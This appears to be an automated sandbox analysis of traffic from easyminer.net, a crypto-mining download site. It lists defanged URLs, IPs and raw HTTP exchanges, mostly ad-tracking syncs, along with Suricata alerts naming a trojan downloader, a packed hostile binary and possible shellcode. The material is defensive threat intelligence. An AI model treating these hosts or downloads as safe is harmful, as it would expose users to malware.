hxxp://dpm.demdex.net/ibs:dpid=30064&dpuuid=15d65aed1dd-30270000010f1a0b&redir=http://ps.eyeota.net/match?bid=6j5b2cv&uid=${DD_UUID}	52.48.149.180
hxxp://fonts.gstatic.com/s/opensans/v14/PRmiXeptR36kaC0GEAetxlRROVH9Vvc8xHnAGvvgPQc.woff	172.217.18.67
hxxp://match.adsrvr.org/track/cmb/generic?ttd_pid=eyeota&ttd_tpi=1	54.247.166.89
hxxp://trc.taboola.com/sg/eyeota/1/cm	151.101.2.2
hxxp://easyminer.net/js/bootstrap/js/bootstrap.min.js?fm=1491181282	89.42.223.49
hxxp://easyminer.net/templates/kickstart/img/bg-header-3.jpg	89.42.223.49
hxxp://easyminer.net/modules/fancybox/js/jquery.fancybox.pack.js?fm=1491181282	89.42.223.49
hxxp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl	62.140.236.171
hxxp://tags.bluekai.com/site/27675?id=2DE7B66B4518725926432CB1022296DF&ret=html&phint=__bk_t=Home Mining cryptocoins made the easy way&phint=__bk_k=&phint=__bk_l=http://easyminer.net/&r=13133386	129.146.12.99
hxxp://ads.avocet.io/getuid?bounce=true&url=http://ps.eyeota.net/match?bid=b2c3gb0&uid={{UUID}}	176.34.148.86
hxxp://easyminer.net/js/frontend/footer.js?fm=1498878551	89.42.223.49
hxxp://ib.adnxs.com/getuid?http://ps.eyeota.net/match?uid=$UID&bid=2cr76e1	185.33.223.200
hxxp://dmp.adform.net/serving/cookie/match/?CC=1&party=1009	37.157.2.25
hxxp://p.rfihub.com/cm?pub=24472&in=1	1.97.192.14
hxxp://sync.mathtag.com/sync/img?mt_exid=10015&redir=http://ps.eyeota.net/match?bid=7vi0rg0&uid=[MM_UUID]	185.29.135.226
hxxp://easyminer.net/templates/kickstart/fonts/fontawesome-webfont.eot?	89.42.223.49
hxxp://ib.adnxs.com/bounce?/getuid?http%3A%2F%2Fps.eyeota.net%2Fmatch%3Fuid%3D%24UID%26bid%3D2cr76e1	185.33.223.200
hxxp://easyminer.net/templates/kickstart/css/user-style.css?fm=1492463567	89.42.223.49
hxxp://easyminer.net/modules/eu_cookie/templates/front/css/divascookies.css?fm=1488863722	89.42.223.49
hxxp://match.adsrvr.org/track/cmf/generic?ttd_pid=eyeota&ttd_tpi=1	54.247.166.89
hxxp://in.v12group.com/insync?vxii_pid=12&vxii_rcid=6e04aa6a-78bd-4ddc-a7ef-3c5e57d34ffb&vxii_pid1=10005&vxii_pdid=2jTZLW4H_a54aWUznu9Vl2uyo57lJEyRlBY79U4BScZ0	34.194.0.60
hxxp://dmp.adform.net/serving/cookie/match/?party=1009	37.157.2.25
hxxp://fonts.gstatic.com/s/opensans/v14/k3k702ZOKiLJc3WVjuplzIraN7vELC11_xip9Rz-hMs.woff	172.217.18.67
hxxp://sync.adap.tv/eyeota_user_sync	52.71.43.244
hxxp://easyminer.net/templates/kickstart/img/icon-browser.png	89.42.223.49
hxxp://easyminer.net/modules/eu_cookie/templates/front/css/divascookies_style_dark_bottom.css?fm=1488863724	89.42.223.49
hxxp://ocsp.starfieldtech.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1+30c7dH4b0W1Ws3NcQwg6piOcCAzkUhA==	50.63.243.230
hxxp://ocsp.starfieldtech.com//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQUwPiEZQ6/sVZNPaFToNfxx8ZwqAQUfAwyH6fZMH/EfWijYqihzqsHWycCAQc=	50.63.243.230
hxxp://bcp.crwdcntrl.net/5/c=3825/tp=DTSC/tpid=2DE7B66B4518725926432CB1022296DF	52.208.215.251
hxxp://easyminer.net/templates/kickstart/img/bg-section-features.jpg	89.42.223.49
hxxp://easyminer.net/uploads/site_favicon.ico	89.42.223.49
hxxp://tags.bluekai.com/site/29539?limit=1&id=2Mo5g13cxp1RQR_Y0XPNVnAI1Fexng56KcfA9OuNEbrM	129.146.12.99
hxxp://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMjg0NTA1NDYvdC8w/url/hxxp://ps.eyeota.net/match?bid=1mpjpn0&turn_id=$!{TURN_UUID}&newuser=1	46.228.164.13
hxxp://easyminer.net/templates/kickstart/img/icon-monitor.png	89.42.223.49
hxxp://s10.histats.com/js15_as.js	46.105.201.240
hxxp://sync-tm.everesttech.net/upi/pid/lons7jax?redir=http://ps.eyeota.net/match?uid=${TM_USER_ID}&bid=0rijhbu	107.21.249.50
hxxp://t.dtscout.com/idg/	107.182.233.217
hxxp://easyminer.net/js/intelli/intelli.js?fm=1491181282	89.42.223.49
hxxp://easyminer.net/cron/?764	89.42.223.49
hxxp://tags.bluekai.com/site/27675?dt=0&r=1573727964&sig=1370858844&bkca=KJhBM1WvQp91CoIZcG5B m3CClPm5 ApiBm0aZtPsCiIdKJBYcdIM8ewEhgSjtVD1ADobygvOkuOXe90OTOs PtVnskcRzAt80woFFd1wxkLUtry9FvlMp8IrRpotsQ5Ph2loMO188UzZUqReNbdTqCvjojzKVatHJF9rTYm8lynw o6i8SRLbxkuAuLNH2GNekr	129.146.12.99
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt	62.140.236.163
hxxp://cms.analytics.yahoo.com/cms?partner_id=Eyeot	188.125.66.34
hxxp://cm.g.doubleclick.net/pixel?google_nid=eye&google_cm&google_sc&bid=gdo9o51&newuser=1	172.217.18.66
hxxp://easyminer.net/templates/kickstart/img/icon-sliders.png	89.42.223.49
hxxp://fonts.googleapis.com/css?family=Open Sans:400,400i,700,700i,800&subset=cyrillic	172.217.18.74
hxxp://match.rundsp.com/match.gif?id=2Zs8eaBuCCVvYgNeWPi-feg-4rhBqXrmhi07KILu_SLQ&partner=eyeota&RED=http://ps.eyeota.net/match?bid=652b2cv&uid=	54.194.53.18
hxxp://eyeota-sync.dotomi.com/eyeota/match?nuid=2OeEhSJbKAKnfeMSs5qpyd25iSorqopqzG8-fwmhBzgQ&rurl=http://ps.eyeota.net/match?bid=r8d1b20	63.215.202.140
hxxp://ads.avocet.io/getuid?url=http://ps.eyeota.net/match?bid=b2c3gb0&uid={{UUID}}	176.34.148.86
hxxp://tags.bluekai.com/site/27675?id=2DE7B66B4518725926432CB1022296DF&ret=html&phint=__bk_t=Home Mining cryptocoins made the easy way&phint=__bk_k=&phint=__bk_l=http://easyminer.net/&r=46412811	129.146.12.99
hxxp://easyminer.net/uploads/site_logo.png	89.42.223.49
hxxp://easyminer.net/js/jquery/jquery.js?fm=1491181282	89.42.223.49
hxxp://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR64T7ooMQqLLQoy+emBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEEEVCOlPdt2vCNZMypqho4I=	178.255.83.1
hxxp://easyminer.net/templates/kickstart/css/iabootstrap.css?fm=1492603357	89.42.223.49
hxxp://easyminer.net/templates/kickstart/img//mountains.jpg	89.42.223.49
hxxp://easyminer.net/js/intelli/intelli.minmax.js?fm=1491181282	89.42.223.49
hxxp://ssl.trustwave.com/issuers/STCA.crt
hxxp://eyeota2waycm.netmng.com/cm/?rd=http://ps.eyeota.net/match?bid=6bmpi0v&uid={UUID}
hxxp://easyminer.net/tmp/cache/intelli.lang.en.js?fm=1499849052	89.42.223.49
hxxp://ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/YHKj6JjF6UBieQioTYpFsuEriQQUtnf6aUhHn1MS1cLqBzJ2B9GXBxkCEGmHlBnZ42JwdJ275Z3GaF4=	23.46.123.27
hxxp://match.adsrvr.org/track/cmf/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=%2Chttp%3A%2F%2Fps.eyeota.net%2Fmatch%3Fuid%3D16918e61-6e26-11e7-8451-005056a24356%26bid%3D6bnoi0v	54.247.166.89
hxxp://ocsp.trustwave.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQ1mI4Ww4R5LZiQ295pj4OF/44yyAQUyk7dWyc1Kdn27sPlU++kwBmWHa8CEQCSuHRPcc7Q4mxyo9jV2SWy	62.140.236.154
hxxp://easyminer.net/templates/kickstart/img/1.png	89.42.223.49
hxxp://dpm.demdex.net/demconf.jpg?et:ibs\|data:dpid=30064&dpuuid=15d65aed1dd-30270000010f1a0b&redir=http://ps.eyeota.net/match?bid=6j5b2cv&uid=${DD_UUID}	52.48.149.180
hxxp://fonts.gstatic.com/s/opensans/v14/EInbV5DfGHOiMmvb1Xr-horaN7vELC11_xip9Rz-hMs.woff	172.217.18.67
hxxp://easyminer.net/modules/fancybox/js/jquery.fancybox.css?fm=1491181282	89.42.223.49
hxxp://easyminer.net/tmp/cache/intelli.config.en.js?fm=1499849052	89.42.223.49
hxxp://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69+Aj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc=	178.255.83.1
hxxp://sync.tidaltv.com/GenericUserSync.ashx?dpid=42	52.19.58.145
hxxp://sync-tm.everesttech.net/ct/upi/pid/lons7jax?redir=http://ps.eyeota.net/match?uid=${TM_USER_ID}&bid=0rijhbu&_test=WXIYRgAAAGbcCHPP	107.21.249.50
n-cdn.areyouahuman.com	52.222.162.179

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Delphi Trojan Downloader User-Agent (JEDI-VCL)
ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /sync/img?mt_exid=10015&redir=http://ps.eyeota.net/match?bid=7vi0rg0&uid=[MM_UUID] HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: sync.mathtag.com

Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily

Date: Fri, 21 Jul 2017 15:05:47 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive

Keep-Alive: timeout=360

Cache-Control: no-cache

set-cookie: uuid=aa6a5972-184b-4000-aa4d-0096e5ec7490; domain=.mathtag.com; path=/; expires=Sat, 18-Aug-2018 15:05:47 GMT

Location: hXXp://sync.mathtag.com/sync/img?mt_exid=10015&redir=http://ps.eyeota.net/match?bid=7vi0rg0&uid=[MM_UUID]&mm_bnc&mm_bct

P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"

Server: MT3 1.15.10.0 a38180b RELEASE cdg-pixel-x11

Expires: Fri, 21 Jul 2017 15:05:46 GMT

HTTP/1.1 302 Moved Temporarily..Date: Fri, 21 Jul 2017 15:05:47 GMT..C
ontent-Type: image/gif..Content-Length: 0..Connection: keep-alive..Kee
p-Alive: timeout=360..Cache-Control: no-cache..set-cookie: uuid=aa6a59
72-184b-4000-aa4d-0096e5ec7490; domain=.mathtag.com; path=/; expires=S
at, 18-Aug-2018 15:05:47 GMT..Location: hXXp://sync.mathtag.com/sync/i
mg?mt_exid=10015&redir=http://ps.eyeota.net/match?bid=7vi0
rg0&uid=[MM_UUID]&mm_bnc&mm_bct..P3P: CP="NOI DSP COR NID CURa
 ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"..Server: MT3 1.15.10
.0 a38180b RELEASE cdg-pixel-x11..Expires: Fri, 21 Jul 2017 15:05:46 G
MT..

GET /match?uid=6436859416475074122&bid=2cr76e1 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:42 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:05:42 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;....

GET /match?bid=9sn4omv&uid=Ru2Z2hPj1DyzuX5&newuser=1 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b

Connection: Keep-Alive

Host: ps.eyeota.net


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:47 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
....

GET /match?bid=7vi0rg0&uid=aa6a5972-184b-4000-aa4d-0096e5ec7490 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:47 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:05:47 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;....

GET /match?bid=6j5b2cv&uid=00702949223008346980439587358349708598 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:52 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:05:52 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;....

GET /match?bid=6bib2cv&uid=EUX6387533831706967011 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b

Connection: Keep-Alive

Host: ps.eyeota.net


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:52 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:05:52 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;....

GET /match?bid=r8hrb20&uid=nil HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b

Connection: Keep-Alive

Host: ps.eyeota.net


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:57 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
....

GET /match?bid=b2c3gb0&uid=005297fc-ec97-47a0-a704-4984e8b602f2 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:57 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:05:57 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;....

GET /match?bid=1mpf4m0&uid=b0a91725-996e-4077-8f53-f9ad0312c26b-tuct6b9dda HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b

Connection: Keep-Alive

Host: ps.eyeota.net


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:06:02 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:06:02 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;....

GET /pixel?e_rc=5&pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: application/javascript

Content-Length: 0

Date: Fri, 21 Jul 2017 15:06:07 GMT

HTTP/1.1 200 OK..Content-Type: application/javascript..Content-Length:
 0..Date: Fri, 21 Jul 2017 15:06:07 GMT..

GET /templates/kickstart/img/icon-sliders.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:39 GMT

Last-Modified: Mon, 17 Apr 2017 21:12:51 GMT

Content-Type: image/png

Content-Length: 7408

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
.PNG........IHDR..............X......IDATx...yp....G.{.nv..w%.*o.....d
S...g.8.Y.1......;N......!!...4....K...>.......I#i..}....~==b.F...1
..........~.....72... ...J ... H.. A...!... H.. A...!... ... H.. A...!
... H.. A...!... H.Z... .I".......O.....@2.M..#Y..cR.',H2.`F.c.. ..CI^
.(. .u0............%..2.;....{.r.y...^..mkU.....Q.....lc.1..y..5#. Lz.
..~.g......k..r.....%A$..i...q.:f....B. ..C..........*..7.E!.D.1.m.:f.
...D;.-...]..,.r.....4.4.a.1......D. &..;...#. Y..M...0.d..........0..
...6x.........XAB....w.)zD.../j....l..........U....J...e...,....(&,.AL
.At..@7d...{M.V.k..a..A.W....6..y. 4.....r(.n.....J.C.......U...%.kq7)
.n...M.c......;"..Nx\..3.....k.;..n|..v..}6..P(m....I..p..lG.X.!=...u.
v.<...u..:.n.z.....qW........V.o.......\..PV..A.(I`..B..j.:.3..._..
.k\........~.6.. ..P_.u[..3K}.Q.WokT.<..b.......W..........`.......
u9`.....c.;...~..90..I..........[..R..g...l. ...]]j..w`....T;,.:.3.=,.
.0.eA...6...2..M.s.......l..@7d.....G...p.@{.......E.8_...y......S....
.rL.t....)...s.B..i.,......2. .%R=.....?.....#|..(.T}.../.....V......j
..........O;..{......9...S3...&...nnQ.]..g.<....l.. ......k@.d...J.
...mGMx;.*...-..*.8....iF..@w.........1Dub............./I.,.-.SW1.....
,......!?.OLP.|../..r.jx^...ay.r.....M.W34.:.N^..u.U..mR......F.q.....
....vln..I...^...LH..X.8..`..T.\Y..7G........w.....3...{.c......Be....
=Z..vP...#..V.-.......s...8.H...q:.xk........s.[7....w.|......a..8_..;
?..V...Xi........U..W.....zT..&..-..\o..3.!....>&..A.~.W..AX<AT.
..V..co.p.BS....g..bu.. h....i4...TC...*....C...8!mS..p..5.j...w..<<< skipped >>>

GET /cron/?764 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Set-Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d; expires=Fri, 21-Jul-2017 15:35:39 GMT; path=/

Content-Type: image/gif

Content-Length: 43

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Connection: Keep-Alive

GIF89a.............!.......,...........D..;....

GET /js/frontend/footer.js?fm=1498878551 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:39 GMT

Last-Modified: Sat, 01 Jul 2017 03:09:11 GMT

Content-Type: application/x-javascript

Content-Length: 3144

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
...........Zmo....._.s.#..T..(......\.^q..-.$0V.Jb.7.K;i......r."...E.
....3..3....4.ve............(.....j#....I........4..... L@...T.....J:^
.'...W.T/.Vt.......8x%..T..6..`~8{...`#.....~.&.....H....4..VEY.d.gIZ.
.l.d..k..a...a.U..?.m.. 4...ls....Y.....e. ...r).Hk....<...V/...u..
4.Z.5...{]m>...r&_..E.S..J.*T..<%..$..N...,.9.l..L9K.YTW..@....x
R.^..ZZ...I.X.rP.0[MO=.Q...D...Y.M.....R.... OW.Y..f.......R..U^..c.1.
\..s...l[..........KS<...S.>...j:y3.w3...[i..I..WK.MSq..*.i.w..7
..i..-.....=..^....xR"...JF........>..%5,....H.D............$F...V.
s....%...rS].....a.N.....g .....=....`3...5.xP.f.i4.Y...x.........<
...: .....B.pJ..G.bC.....Xlf...K..K.,.9..S.&...............8...h...~.V
......%....I.....4.y..v.$.......d...k.~3g`C....%..,..Z.i......!...u...
3.0..........N.j......>.6_.0...uMd../..... .S...K.d.(......>../.
..U\~z.._..wCz_c..y...b...[...<.].j...py..E....."...V..2U......`...
.~.d.....c..DV..A...M.X.....C..R...P...V.4.0..U-J..)..B1J3....& ..u..h
GG....Q9.A.H..............L.RM..~lO'j...........e.....Z4Xl.....g......
....Q3...c.....}.o ..,.........l.|.......W.........Ig@....1.....'...Y.
...I...B....W...l2k...w.SV..zS."..*G.Bk.....6..Q.:#...@L...m.v..Wt..=&
gt;K.C?..m.PO.H.N.aTu............?.x..I....R.C.g(..Y.d.[.,.~.D..5....R
e..q....?..A..S.V@l..5)*......k..e../.Eq..|.$.......sQ......E.0.B .. v
 ...q(J?...@.rE.).....}.m...1....*..>@....Q...z......&.r.]*..{.?..7
.n.h..Q..?#.P.......8.6=.q...8.NH.6.....<I.$.....U....9.I....Q...9.
. A..0....|.....>.u5.....k..2..V..d/...d..|...t;.w=G...X..v,...<<< skipped >>>

GET /modules/eu_cookie/js/frontend/jquery.divascookies-0.3.min.js?fm=1488863716 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:40 GMT

Last-Modified: Tue, 07 Mar 2017 05:15:16 GMT

Content-Type: application/x-javascript

Content-Length: 1250

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:40 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
...........Wmo.6..._A.X,...l...QV4i..}[.b......f".*I.5\...EI.U'm.`@ ."
..Gw....G=r!n.!.J..0.......Y1.......w.......D....[.Rg.x.!n......3HA...
K1.,.$x.,..s...*a..2%/D..\=_.".R...L...-0.9W).T...~Z.d...7.Y!. ...m *.
*.q.d.....6.rMl,aE.......gE...\.6..flp..T%.....g.0.......\h01...._^\]Z
.t.6...s......N...[h......&..Qz......a...3.{.(c[GY..)......cz...`...@.
........^.L$..B.......7.S..]....A.v!t..k..n~.)..9.I..}RX..w..f...N....
LHh.|.j.!*......T. ..f.....E.......(..~........?5S.v....}.}.A..b.B.0..
....[.....h...qo..y..f.d.l...-.e...M.........Y..<....._....L,..Y.|.
S, .d........g..8?.........i......0..,.Q.-q..FGG..8..NKGG<.m.$.n.U.
......_..g...La.,.x..*.. 9..^:].[...L ..(...etC,.#..9......b}.....|.0.
&C..O0:..ne..F...........J{.........Je.. b..p....Y...S.C/.a....Vt....N
M.......6t9A.N.X.q..x..wmr@.....K....s,?.sFC*.).>..t.[b.= ...T....5
.z..)...$...DO......4...:...:..H.....vw....^....:".=..:....... .}...O.
N|B;^\>yf?^.... l.w/....]Q....V.B-.2X2.9.ji`P..8k.5..~_.....'...I.3
....0`..*]SV.I..w.".$......XF..W..w.....?..d...LJ.&.)......`3Ux./.tx2.
}.....)/..[...Z...'`..r.}.Bc.N....Hl?.q.V.!R"W,jR.A..}...0....'M0../p.
.,J......ux....4R..".(.2.l...DGx%.x.K.f.RB%...>:R.l.E.Zv@.....n.i..
..~.7zl..I...>..O... #`...A........$...,....^....C..$V../.r.....l./
~Q.i........
<<< skipped >>>

GET /templates/kickstart/img/icon-monitor.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:40 GMT

Last-Modified: Mon, 17 Apr 2017 21:12:51 GMT

Content-Type: image/png

Content-Length: 5997

Date: Fri, 21 Jul 2017 15:05:40 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
.PNG........IHDR..............X.....4IDATx....s.Uz...~I%U..*..UI....P.
..e...R.mll..m.\.......Vv..,.0.c...\...l..1.l.%..m,.H..<#izz..==}9y
...".$...........LO.y.y.>.O.f.B...`fP..@.. ..............A.. .@....
...... .i^B\fY...4.......B ]B\...hd..v.;....m_J.z{O...ow.z...q/.0...u.
..........P.......=;.gw....\}... ..Q\u..mB............v..:=........W..
.....7......n3.h.8.9...v..pz.ht"p..kv/[.....V.?......4 6;.....F...}|.U
W..{........v...\w........*.....`7...T.^P1.|..).....{.....'n......I<
;......*.j..0....U..'D.M..{~.:w..K..a...TK.....n.ylm{Dl..Y.]..`.....0.
2...U...jM[L...f{.m.w............U... ..;......\A.A..jQ..z..y..Z..^...
rl5S.. .z..X..-.(^ j.B..........W.b.k$...d..~OgN.g.&..S.*..6...u.....Z
..%..A.6oP.DU[6...J3....h..SZ*...1..n..vLo..U..l.U...........m..g.^*.M
.Z7..=..c3..8.|%.q.p[.6.X.A...NKl...........u..%.u......L...H..nTB.[..
 ....M...D.g...Z....9.J.....!.^..<....p....M..k.$.{...Y.-|{.D..*..[
.....r.y}jNI.=J.....e.M.46.Ketu.D..\D.=...c......e..lJI.:d*....t......
